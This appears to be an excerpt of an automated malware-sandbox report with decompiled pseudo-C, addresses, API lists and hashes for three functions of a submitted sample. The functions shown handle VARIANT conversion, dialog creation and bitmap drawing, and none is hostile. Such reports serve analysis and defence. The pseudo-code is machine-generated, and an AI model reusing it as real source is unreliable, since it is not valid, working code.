      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Color$Brush
      • String ID:
      • API String ID: 2798902688-0
      • Opcode ID: a267769f8a90cfc9d03250af2f2db05e64404917cf643283451e21d8612cbf5e
      • Instruction ID: b3f96fd95dd03a44b4fc6efbf8d69926e6eef0530adf4d0ce7a24cfd66f5c827
      • Opcode Fuzzy Hash: a267769f8a90cfc9d03250af2f2db05e64404917cf643283451e21d8612cbf5e
      • Instruction Fuzzy Hash: B1F0FE719417445BD730BBB25D09B47BAE1EFC4710F02092AE2458B990D6B6E441DF40
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00A0F545 Relevance: 9.2, APIs: 6, Instructions: 241stringCOMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E00A0F545(void* __ebx, intOrPtr __ecx, intOrPtr __edx, CHAR* __edi, void* __esi, void* __eflags) {
				CHAR* _t116;
				CHAR* _t117;
				char _t130;
				char _t135;
				CHAR* _t136;
				char _t139;
				void* _t140;
				char _t143;
				char _t146;
				signed short _t149;
				signed int _t151;
				CHAR* _t154;
				signed int _t155;
				signed int _t165;
				char _t169;
				void* _t172;
				void* _t176;
				intOrPtr _t181;
				CHAR* _t183;
				CHAR* _t185;
				char* _t188;
				void* _t189;
				CHAR* _t190;
				char* _t192;
				void* _t193;
				long long _t197;

				_t193 = __eflags;
				_t182 = __edi;
				_t181 = __edx;
				_push(0x50);
				E00AAD2D1(0xacd030, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t189 - 0x2c)) = __ecx;
				E009BD7C9(_t189 - 0x44, _t193,  *((intOrPtr*)(__ecx + 0x1c)));
				_t169 =  *(_t189 + 8);
				_t116 =  *(_t169 + 8);
				 *(_t189 - 4) =  *(_t189 - 4) & 0x00000000;
				 *(_t189 - 0x19) = 0;
				 *(_t189 - 0x18) = _t116;
				if(_t116 == 0) {
					 *(_t189 - 0x18) = _t189 - 0x19;
				}
				_t117 = lstrlenA( *(_t189 - 0x18));
				_t195 =  *(_t189 + 0xc) & 0x0000000c;
				_t185 = _t117;
				 *((intOrPtr*)(_t189 - 0x20)) =  *((intOrPtr*)(_t169 + 0x10));
				 *(_t189 - 0x24) =  *(_t169 + 0xc) & 0x0000ffff;
				if(( *(_t189 + 0xc) & 0x0000000c) == 0) {
					L8:
					_t185 =  *(_t189 + 0x14);
					_push(_t185[8] << 4);
					_t122 = E009B935A(_t169, _t181, _t182, _t185, __eflags);
					_pop(_t172);
					__eflags = _t122;
					if(_t122 == 0) {
						L4:
						 *(_t189 - 4) =  *(_t189 - 4) | 0xffffffff;
						E009BCF01(_t122, _t189 - 0x44);
						L48:
						return E00AAD32D(_t169, _t182, _t185);
					}
					_t185 = _t185[8];
					__eflags = _t185 - 0x7ffffff;
					if(_t185 > 0x7ffffff) {
						goto L4;
					}
					E00AAD9E0(_t185 << 4);
					 *(_t189 - 0x10) = _t190;
					 *(_t189 - 0x28) = _t190;
					E00AAB3F0( *(_t189 - 0x28), 0, _t185 << 4);
					_t192 =  &(_t190[0xc]);
					_t182 = E00A0ED4E(_t172,  *(_t189 - 0x18),  *(_t189 - 0x24));
					_t46 =  &(_t182[0x10]); // 0x10
					_t187 = _t46;
					_push(_t46);
					_t130 = E009B935A(_t169, _t181, _t182, _t46, __eflags);
					__eflags = _t130;
					if(_t130 != 0) {
						E00AAD9E0(_t187);
						 *(_t189 - 0x10) = _t192;
						_t169 = 0;
						_t188 = _t192;
						 *((intOrPtr*)(_t189 - 0x58)) = 0xae3f48;
						 *((intOrPtr*)(_t189 - 0x54)) = 0;
						 *((intOrPtr*)(_t189 - 0x48)) = 0;
						 *((intOrPtr*)(_t189 - 0x4c)) = 0;
						 *((intOrPtr*)(_t189 - 0x50)) = 0;
						_push(_t189 - 0x58);
						_push( *(_t189 - 0x28));
						_push( *((intOrPtr*)(_t189 + 0x18)));
						 *(_t189 - 4) = 1;
						_push( *(_t189 + 0x14));
						_push( *(_t189 - 0x24));
						_push(_t189 - 0x3c);
						_push( *(_t189 - 0x18));
						_push(_t188);
						_t135 = E00A0F245(0,  *((intOrPtr*)(_t189 - 0x2c)), _t182, _t188, __eflags);
						 *(_t189 - 0x18) = _t135;
						__eflags = _t135;
						if(_t135 != 0) {
							L23:
							_t136 =  *(_t189 + 0x14);
							_t185 = 0;
							__eflags = _t136[8];
							if(_t136[8] <= 0) {
								L26:
								__eflags =  *(_t189 - 0x18);
								_t176 = _t189 - 0x58;
								if( *(_t189 - 0x18) == 0) {
									E00A0F1B3(_t176);
									_t182 =  *(_t189 + 0x10);
									__eflags = _t182;
									if(_t182 == 0) {
										_t139 = ( *(_t189 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t139;
										if(_t139 == 0) {
											__imp__#6(_t169);
											L47:
											 *(_t189 - 4) = 0;
											_t140 = E00A0F0D3(_t189 - 0x58);
											 *(_t189 - 4) =  *(_t189 - 4) | 0xffffffff;
											E009BCF01(_t140, _t189 - 0x44);
											__eflags = 0;
											goto L48;
										}
										_t143 = _t139 - 1;
										__eflags = _t143;
										if(_t143 == 0) {
											L43:
											__eflags = _t169;
											if(_t169 != 0) {
												 *((intOrPtr*)( *_t169 + 8))(_t169);
											}
											goto L47;
										}
										_t146 = _t143 - 3;
										__eflags = _t146;
										if(_t146 == 0) {
											__imp__#9(_t189 - 0x3c);
											goto L47;
										}
										__eflags = _t146 != 1;
										if(_t146 != 1) {
											goto L47;
										}
										goto L43;
									}
									_t149 =  *(_t189 - 0x24);
									 *_t182 = _t149;
									_t151 = (_t149 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t151 - 0x13;
									if(_t151 > 0x13) {
										goto L47;
									}
									switch( *((intOrPtr*)(_t151 * 4 +  &M00A0F83D))) {
										case 0:
											 *((short*)(__edi + 8)) = __bx;
											goto L47;
										case 1:
											 *((intOrPtr*)(__edi + 8)) = __ebx;
											goto L47;
										case 2:
											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x3c));
											goto L47;
										case 3:
											 *((long long*)(__edi + 8)) =  *((long long*)(__ebp - 0x3c));
											goto L47;
										case 4:
											__eax =  *((intOrPtr*)(__ebp - 0x3c));
											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x3c));
											__eax =  *((intOrPtr*)(__ebp - 0x38));
											 *((intOrPtr*)(__edi + 0xc)) =  *((intOrPtr*)(__ebp - 0x38));
											goto L47;
										case 5:
											__eax = 0;
											__eflags = __bx;
											0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
											 *((short*)(__edi + 8)) = __ax;
											goto L47;
										case 6:
											__esi = __ebp - 0x3c;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L47;
										case 7:
											goto L47;
										case 8:
											_t182[8] = _t169;
											goto L47;
									}
								}
								 *(_t189 - 4) = 0;
								_t130 = E00A0F0D3(_t176);
								_t185 =  *(_t189 - 0x18);
								L12:
								 *(_t189 - 4) =  *(_t189 - 4) | 0xffffffff;
								E009BCF01(_t130, _t189 - 0x44);
								goto L48;
							}
							_t183 =  *(_t189 - 0x28);
							do {
								__imp__#9(_t183);
								_t154 =  *(_t189 + 0x14);
								_t185 =  &(_t185[1]);
								_t183 =  &(_t183[0x10]);
								__eflags = _t185 - _t154[8];
							} while (_t185 < _t154[8]);
							goto L26;
						}
						_t155 =  *(_t189 - 0x24) & 0x0000ffff;
						_push(_t182);
						_push(_t188);
						_push( *((intOrPtr*)(_t189 - 0x20)));
						 *(_t189 - 4) = 2;
						__eflags = _t155 - 4;
						if(_t155 == 4) {
							E00A88156();
							 *((intOrPtr*)(_t189 - 0x2c)) = _t197;
							 *((intOrPtr*)(_t189 - 0x3c)) =  *((intOrPtr*)(_t189 - 0x2c));
							L22:
							 *(_t189 - 4) = 1;
							goto L23;
						}
						__eflags = _t155 - 5;
						if(_t155 == 5) {
							L20:
							E00A88156();
							 *((long long*)(_t189 - 0x3c)) = _t197;
							goto L22;
						}
						__eflags = _t155 - 7;
						if(_t155 == 7) {
							goto L20;
						}
						__eflags = _t155 + 0xffffffec - 1;
						if(_t155 + 0xffffffec > 1) {
							_t169 = E00A88156();
						} else {
							 *((intOrPtr*)(_t189 - 0x3c)) = E00A88156();
							 *((intOrPtr*)(_t189 - 0x38)) = _t181;
						}
						goto L22;
					}
					_t185 = 0x8007000e;
					goto L12;
				}
				_t20 =  &(_t185[3]); // 0x3
				_t182 = _t20;
				_push(_t20);
				if(E009B935A(_t169, _t181, _t20, _t185, _t195) != 0) {
					E00AAD9E0(_t182);
					 *(_t189 - 0x10) = _t190;
					_t182 = _t190;
					_t26 =  &(_t185[3]); // 0x3
					E009A681A(_t182, _t26,  *(_t189 - 0x18), _t185);
					_t165 =  *(_t169 + 0xc) & 0x0000ffff;
					_t190 =  &(_t190[0x10]);
					 *(_t189 - 0x18) = _t182;
					__eflags = _t165 - 8;
					if(_t165 == 8) {
						_t165 = 0xe;
					}
					_t29 = _t189 - 0x24;
					 *_t29 =  *(_t189 - 0x24) & 0x00000000;
					__eflags =  *_t29;
					_t182[_t185] = 0xff;
					_t182[ &(_t185[1])] = _t165;
					_t182[ &(_t185[2])] = 0;
					 *((intOrPtr*)(_t189 - 0x20)) =  *((intOrPtr*)(_t169 + 0x14));
					goto L8;
				}
				goto L4;
			}





























      0x00a0f545
      0x00a0f545
      0x00a0f545
      0x00a0f545
      0x00a0f54c
      0x00a0f551
      0x00a0f55a
      0x00a0f55f
      0x00a0f562
      0x00a0f565
      0x00a0f569
      0x00a0f56d
      0x00a0f572
      0x00a0f577
      0x00a0f577
      0x00a0f57d
      0x00a0f583
      0x00a0f587
      0x00a0f58c
      0x00a0f593
      0x00a0f596
      0x00a0f5ff
      0x00a0f5ff
      0x00a0f608
      0x00a0f609
      0x00a0f60e
      0x00a0f60f
      0x00a0f611
      0x00a0f5a6
      0x00a0f5a6
      0x00a0f5ad
      0x00a0f82f
      0x00a0f837
      0x00a0f837
      0x00a0f613
      0x00a0f616
      0x00a0f61c
      0x00000000
      0x00000000
      0x00a0f623
      0x00a0f628
      0x00a0f62b
      0x00a0f634
      0x00a0f639
      0x00a0f647
      0x00a0f649
      0x00a0f649
      0x00a0f64c
      0x00a0f64d
      0x00a0f653
      0x00a0f655
      0x00a0f671
      0x00a0f676
      0x00a0f679
      0x00a0f67b
      0x00a0f67d
      0x00a0f684
      0x00a0f687
      0x00a0f68a
      0x00a0f68d
      0x00a0f696
      0x00a0f697
      0x00a0f69d
      0x00a0f6a0
      0x00a0f6a4
      0x00a0f6a7
      0x00a0f6aa
      0x00a0f6ab
      0x00a0f6ae
      0x00a0f6af
      0x00a0f6b4
      0x00a0f6b7
      0x00a0f6b9
      0x00a0f714
      0x00a0f714
      0x00a0f717
      0x00a0f719
      0x00a0f71c
      0x00a0f734
      0x00a0f734
      0x00a0f738
      0x00a0f73b
      0x00a0f774
      0x00a0f779
      0x00a0f77c
      0x00a0f77e
      0x00a0f7e6
      0x00a0f7e6
      0x00a0f7e9
      0x00a0f80f
      0x00a0f815
      0x00a0f818
      0x00a0f81c
      0x00a0f821
      0x00a0f828
      0x00a0f82d
      0x00000000
      0x00a0f82d
      0x00a0f7eb
      0x00a0f7eb
      0x00a0f7ec
      0x00a0f7f6
      0x00a0f7f6
      0x00a0f7f8
      0x00a0f7fd
      0x00a0f7fd
      0x00000000
      0x00a0f7f8
      0x00a0f7ee
      0x00a0f7ee
      0x00a0f7f1
      0x00a0f806
      0x00000000
      0x00a0f806
      0x00a0f7f3
      0x00a0f7f4
      0x00000000
      0x00000000
      0x00000000
      0x00a0f7f4
      0x00a0f780
      0x00a0f783
      0x00a0f789
      0x00a0f78c
      0x00a0f78f
      0x00000000
      0x00000000
      0x00a0f795
      0x00000000
      0x00a0f7a1
      0x00000000
      0x00000000
      0x00a0f7dd
      0x00000000
      0x00000000
      0x00a0f7b8
      0x00000000
      0x00000000
      0x00a0f7c0
      0x00000000
      0x00000000
      0x00a0f7a7
      0x00a0f7aa
      0x00a0f7ad
      0x00a0f7b0
      0x00000000
      0x00000000
      0x00a0f7c5
      0x00a0f7c7
      0x00a0f7cd
      0x00a0f7ce
      0x00000000
      0x00000000
      0x00a0f7d4
      0x00a0f7d7
      0x00a0f7d8
      0x00a0f7d9
      0x00a0f7da
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00a0f79c
      0x00000000
      0x00000000
      0x00a0f795
      0x00a0f73d
      0x00a0f741
      0x00a0f746
      0x00a0f65c
      0x00a0f65c
      0x00a0f663
      0x00000000
      0x00a0f668
      0x00a0f71e
      0x00a0f721
      0x00a0f722
      0x00a0f728
      0x00a0f72b
      0x00a0f72c
      0x00a0f72f
      0x00a0f72f
      0x00000000
      0x00a0f721
      0x00a0f6bb
      0x00a0f6bf
      0x00a0f6c0
      0x00a0f6c1
      0x00a0f6c4
      0x00a0f6c8
      0x00a0f6cb
      0x00a0f6ff
      0x00a0f704
      0x00a0f70a
      0x00a0f70d
      0x00a0f70d
      0x00000000
      0x00a0f70d
      0x00a0f6cd
      0x00a0f6d0
      0x00a0f6f5
      0x00a0f6f5
      0x00a0f6fa
      0x00000000
      0x00a0f6fa
      0x00a0f6d2
      0x00a0f6d5
      0x00000000
      0x00000000
      0x00a0f6da
      0x00a0f6dd
      0x00a0f6f1
      0x00a0f6df
      0x00a0f6e4
      0x00a0f6e7
      0x00a0f6e7
      0x00000000
      0x00a0f6dd
      0x00a0f657
      0x00000000
      0x00a0f657
      0x00a0f598
      0x00a0f598
      0x00a0f59b
      0x00a0f5a4
      0x00a0f5be
      0x00a0f5c3
      0x00a0f5c6
      0x00a0f5cc
      0x00a0f5d1
      0x00a0f5d6
      0x00a0f5da
      0x00a0f5dd
      0x00a0f5e0
      0x00a0f5e3
      0x00a0f5e7
      0x00a0f5e7
      0x00a0f5e8
      0x00a0f5e8
      0x00a0f5e8
      0x00a0f5ec
      0x00a0f5f0
      0x00a0f5f4
      0x00a0f5fc
      0x00000000
      0x00a0f5fc
      0x00000000

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 00A0F54C
        • Part of subcall function 009BD7C9: ActivateActCtx.KERNEL32(?,?), ref: 009BD7EC
      • lstrlenA.KERNEL32(00000000,000000FF,00000050,009C9FC4,00000000,00000001,?,?,000000FF,?,?,?,?,?,?,00000034), ref: 00A0F57D
        • Part of subcall function 009A681A: _memcpy_s.LIBCMT ref: 009A682B
      • _memset.LIBCMT ref: 00A0F634
        • Part of subcall function 00A0F245: __EH_prolog3.LIBCMT ref: 00A0F24C
        • Part of subcall function 00A0F245: VariantChangeType.OLEAUT32(?,?,00000000,0000000C), ref: 00A0F318
        • Part of subcall function 00A0F245: SysFreeString.OLEAUT32(?), ref: 00A0F348
      • VariantClear.OLEAUT32(?), ref: 00A0F722
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Variant$ActivateChangeClearFreeH_prolog3H_prolog3_catch_StringType_memcpy_s_memsetlstrlen
      • String ID:
      • API String ID: 1135064923-0
      • Opcode ID: e48559bf1a93113dea09127c07df2d7bf38e5da1944b520aaee20df94336b23f
      • Instruction ID: eed18c364c0f9f7642bb3ab53b7af72651f49b582db2309249e5e794e450f00b
      • Opcode Fuzzy Hash: e48559bf1a93113dea09127c07df2d7bf38e5da1944b520aaee20df94336b23f
      • Instruction Fuzzy Hash: 8E91B131C0020EDFCF20DFA4E9856EEBBB4BF05310F248265E415BBA91DB31A955DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4C39 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
      Download Yara Rule
      C-Code - Quality: 91%
      			E009B4C39(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t61;
				signed int _t67;
				signed int _t69;
				struct HWND__* _t70;
				signed int _t73;
				signed int _t103;
				void* _t114;
				signed int _t117;
				DLGTEMPLATE* _t118;
				struct HWND__* _t119;
				intOrPtr* _t121;
				void* _t122;

				_t116 = __edi;
				_t114 = __edx;
				_t97 = __ecx;
				_push(0x3c);
				E00AAD265(0xac8404, __ebx, __edi, __esi);
				_t121 = __ecx;
				 *((intOrPtr*)(_t122 - 0x20)) = __ecx;
				_t126 =  *(_t122 + 0x10);
				if( *(_t122 + 0x10) == 0) {
					 *(_t122 + 0x10) =  *(E009BD77F(0, __edi, __ecx, _t126) + 0xc);
				}
				_t117 =  *(E009BD77F(0, _t116, _t121, _t126) + 0x3c);
				 *(_t122 - 0x28) = _t117;
				 *(_t122 - 0x14) = 0;
				 *(_t122 - 4) = 0;
				E009AFF05(0, _t97, _t117, _t121, _t126, 0x10);
				E009AFF05(0, _t97, _t117, _t121, _t126, 0x3c000);
				E009C32CC();
				if(_t117 == 0) {
					_t118 =  *(_t122 + 8);
					L7:
					__eflags = _t118;
					if(_t118 == 0) {
						L4:
						_t61 = 0;
						L26:
						return E00AAD30A(_t61);
					}
					E009A5D70(_t122 - 0x1c, _t114, E009B9D52());
					 *(_t122 - 4) = 1;
					 *((intOrPtr*)(_t122 - 0x18)) = 0;
					_t67 = E009C972E(__eflags, _t118, _t122 - 0x1c, _t122 - 0x18);
					__eflags = _t67;
					__eflags = 0 | _t67 == 0x00000000;
					if(__eflags != 0) {
						_push(_t118);
						E009C96F2(_t122 - 0x38);
						 *(_t122 - 4) = 2;
						E009C964E(_t122 - 0x38,  *((intOrPtr*)(_t122 - 0x18)));
						 *(_t122 - 0x14) = E009C9372(_t122 - 0x38);
						 *(_t122 - 4) = 1;
						E009C9364(_t122 - 0x38);
						__eflags =  *(_t122 - 0x14);
						if(__eflags != 0) {
							_t118 = GlobalLock( *(_t122 - 0x14));
						}
					}
					 *(_t121 + 0x60) =  *(_t121 + 0x60) | 0xffffffff;
					 *(_t121 + 0x58) =  *(_t121 + 0x58) | 0x00000010;
					E009AED3F(0, __eflags, _t121);
					_t69 =  *(_t122 + 0xc);
					__eflags = _t69;
					if(_t69 != 0) {
						_t70 =  *(_t69 + 0x20);
					} else {
						_t70 = 0;
					}
					_t119 = CreateDialogIndirectParamA( *(_t122 + 0x10), _t118, _t70, E009B4597, 0);
					E009A5510( *((intOrPtr*)(_t122 - 0x1c)) + 0xfffffff0, _t114);
					 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
					_t103 =  *(_t122 - 0x28);
					__eflags = _t103;
					if(__eflags != 0) {
						__eflags = _t119;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t103 + 0x18))(_t122 - 0x48);
							 *((intOrPtr*)( *_t121 + 0x158))(0);
						}
					}
					_t73 = E009AC9C6(0, _t119, __eflags);
					__eflags = _t73;
					if(_t73 == 0) {
						 *((intOrPtr*)( *_t121 + 0x120))();
					}
					__eflags = _t119;
					if(_t119 != 0) {
						__eflags =  *(_t121 + 0x58) & 0x00000010;
						if(( *(_t121 + 0x58) & 0x00000010) == 0) {
							DestroyWindow(_t119);
							_t119 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t122 - 0x14);
					if( *(_t122 - 0x14) != 0) {
						GlobalUnlock( *(_t122 - 0x14));
						GlobalFree( *(_t122 - 0x14));
					}
					__eflags = _t119;
					_t54 = _t119 != 0;
					__eflags = _t54;
					_t61 = 0 | _t54;
					goto L26;
				}
				_push(_t122 - 0x48);
				if( *((intOrPtr*)( *_t121 + 0x158))() != 0) {
					_t118 =  *((intOrPtr*)( *_t117 + 0x14))(_t122 - 0x48,  *(_t122 + 8));
					goto L7;
				}
				goto L4;
			}















      0x009b4c39
      0x009b4c39
      0x009b4c39
      0x009b4c39
      0x009b4c40
      0x009b4c45
      0x009b4c47
      0x009b4c4c
      0x009b4c4f
      0x009b4c59
      0x009b4c59
      0x009b4c61
      0x009b4c66
      0x009b4c69
      0x009b4c6c
      0x009b4c6f
      0x009b4c79
      0x009b4c7e
      0x009b4c85
      0x009b4cb2
      0x009b4cb5
      0x009b4cb5
      0x009b4cb7
      0x009b4c99
      0x009b4c99
      0x009b4df0
      0x009b4df5
      0x009b4df5
      0x009b4cc2
      0x009b4cd0
      0x009b4cd4
      0x009b4cd7
      0x009b4ce1
      0x009b4ce6
      0x009b4ce8
      0x009b4cea
      0x009b4cee
      0x009b4cf9
      0x009b4cfd
      0x009b4d0d
      0x009b4d10
      0x009b4d14
      0x009b4d19
      0x009b4d1c
      0x009b4d27
      0x009b4d27
      0x009b4d1c
      0x009b4d29
      0x009b4d2d
      0x009b4d32
      0x009b4d37
      0x009b4d3a
      0x009b4d3c
      0x009b4d42
      0x009b4d3e
      0x009b4d3e
      0x009b4d3e
      0x009b4d5c
      0x009b4d5e
      0x009b4d63
      0x009b4d8d
      0x009b4d90
      0x009b4d92
      0x009b4d94
      0x009b4d96
      0x009b4d9e
      0x009b4da6
      0x009b4da6
      0x009b4d96
      0x009b4dac
      0x009b4db1
      0x009b4db3
      0x009b4db9
      0x009b4db9
      0x009b4dbf
      0x009b4dc1
      0x009b4dc3
      0x009b4dc7
      0x009b4dca
      0x009b4dd0
      0x009b4dd0
      0x009b4dd0
      0x009b4dc7
      0x009b4dd2
      0x009b4dd5
      0x009b4dda
      0x009b4de3
      0x009b4de3
      0x009b4deb
      0x009b4ded
      0x009b4ded
      0x009b4ded
      0x00000000
      0x009b4ded
      0x009b4c8c
      0x009b4c97
      0x009b4cae
      0x00000000
      0x009b4cae
      0x00000000

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009B4C40
      • GlobalLock.KERNEL32 ref: 009B4D21
      • CreateDialogIndirectParamA.USER32(?,?,?,009B4597,00000000), ref: 009B4D50
      • DestroyWindow.USER32(00000000,?,00000024,009A4695,3A0E8B0C), ref: 009B4DCA
      • GlobalUnlock.KERNEL32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4DDA
      • GlobalFree.KERNEL32 ref: 009B4DE3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
      • String ID:
      • API String ID: 3003189058-0
      • Opcode ID: 0ec764f27f892a1531a4b2f5acad3b2ad4743d85a1c68b43ee0fcdc40d08ad0f
      • Instruction ID: 7d462da688d702cd5dde56c64efdcc6cfd2d4b27c26afcab3ee8e05b3ffb2239
      • Opcode Fuzzy Hash: 0ec764f27f892a1531a4b2f5acad3b2ad4743d85a1c68b43ee0fcdc40d08ad0f
      • Instruction Fuzzy Hash: 65519371901249DFCF14EFA4CA89AEE7BB9AF84320F15042DF502A72D2DB309A41DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B78CF Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009B78CF(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t60;
				intOrPtr _t64;
				struct HDC__* _t65;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t106;
				intOrPtr _t110;
				void* _t113;

				_t111 = __esi;
				_t109 = __edi;
				_t106 = __edx;
				_t93 = __ecx;
				_push(0x40);
				E00AAD29B(0xac8639, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t113 - 0x4c)) =  *((intOrPtr*)(_t113 + 0xc));
				_t60 =  *((intOrPtr*)(_t113 + 0x10));
				 *((intOrPtr*)(_t113 - 0x48)) = __ecx;
				_t115 = _t60;
				if(_t60 != 0) {
					 *_t60 = 0;
				}
				 *(_t113 - 0x2c) = GetDC(0);
				_t110 = E009BAD30(0, _t93, _t106, _t109, _t111, _t115, _t61);
				E009BA639(_t113 - 0x44);
				 *(_t113 - 4) = 0;
				 *((intOrPtr*)(_t113 - 0x34)) = _t110;
				 *((intOrPtr*)(_t113 - 0x30)) = 0;
				 *((intOrPtr*)(_t113 - 0x24)) = 0;
				 *((intOrPtr*)(_t113 - 0x28)) = 0xad7e64;
				_t64 =  *((intOrPtr*)(_t113 + 8));
				 *(_t113 - 4) = 1;
				 *((intOrPtr*)(_t113 - 0x20)) = 0;
				 *((intOrPtr*)(_t113 - 0x1c)) = 0;
				 *((intOrPtr*)(_t113 - 0x18)) = _t64;
				 *((intOrPtr*)(_t113 - 0x14)) = _t64;
				if(_t110 != 0) {
					_t65 =  *(_t110 + 4);
				} else {
					_t65 = 0;
				}
				if(E009BAD44(0, _t113 - 0x44, _t106, _t110, CreateCompatibleDC(_t65)) == 0) {
					ReleaseDC(0,  *(_t113 - 0x2c));
					 *(_t113 - 4) = 0;
					 *((intOrPtr*)(_t113 - 0x28)) = 0xad7e64;
					E009A93B2(0, _t113 - 0x28, _t110, 0xad7e64, __eflags);
					 *(_t113 - 4) =  *(_t113 - 4) | 0xffffffff;
					E009BADC5(_t113 - 0x44);
					__eflags = 0;
				} else {
					if(E009BB018(0, _t113 - 0x28, _t106, _t110, CreateCompatibleBitmap( *(_t110 + 4),  *((intOrPtr*)(_t113 - 0x18)) -  *((intOrPtr*)(_t113 - 0x20)),  *((intOrPtr*)(_t113 - 0x14)) -  *((intOrPtr*)(_t113 - 0x1c)))) != 0) {
						 *((intOrPtr*)(_t113 - 0x34)) = _t113 - 0x44;
						 *((intOrPtr*)(_t113 - 0x30)) = E009BB0A9( *((intOrPtr*)(_t113 - 0x40)),  *((intOrPtr*)(_t113 - 0x24)));
					}
					E009BB0A9( *((intOrPtr*)(_t113 - 0x40)),  *((intOrPtr*)(_t113 - 0x24)));
					_t108 = _t113 - 0x44;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t113 - 0x48)))) + 0x10c))(_t113 - 0x44, _t113 - 0x20);
					if( *((intOrPtr*)(_t113 - 0x34)) != _t110) {
						_t86 =  *((intOrPtr*)(_t113 - 0x30));
						_t120 = _t86;
						if(_t86 != 0) {
							_t87 =  *((intOrPtr*)(_t86 + 4));
						} else {
							_t87 = 0;
						}
						E009BB0A9( *((intOrPtr*)(_t113 - 0x40)), _t87);
					}
					ReleaseDC(0,  *(_t113 - 0x2c));
					 *((intOrPtr*)( *((intOrPtr*)(_t113 - 0x4c)))) = E009BB046(0, _t113 - 0x28, _t108);
					 *(_t113 - 4) = 0;
					 *((intOrPtr*)(_t113 - 0x28)) = 0xad7e64;
					E009A93B2(0, _t113 - 0x28, _t110, 0xad7e64, _t120);
					 *(_t113 - 4) =  *(_t113 - 4) | 0xffffffff;
					E009BADC5(_t113 - 0x44);
				}
				return E00AAD31E(0, _t110, 0xad7e64);
			}











      0x009b78cf
      0x009b78cf
      0x009b78cf
      0x009b78cf
      0x009b78cf
      0x009b78d6
      0x009b78de
      0x009b78e1
      0x009b78e6
      0x009b78e9
      0x009b78eb
      0x009b78ed
      0x009b78ed
      0x009b78f7
      0x009b7902
      0x009b7904
      0x009b790e
      0x009b7911
      0x009b7914
      0x009b7917
      0x009b791a
      0x009b791d
      0x009b7920
      0x009b7924
      0x009b7927
      0x009b792a
      0x009b792d
      0x009b7932
      0x009b7938
      0x009b7934
      0x009b7934
      0x009b7934
      0x009b794d
      0x009b79ff
      0x009b7a08
      0x009b7a0b
      0x009b7a0e
      0x009b7a13
      0x009b7a1a
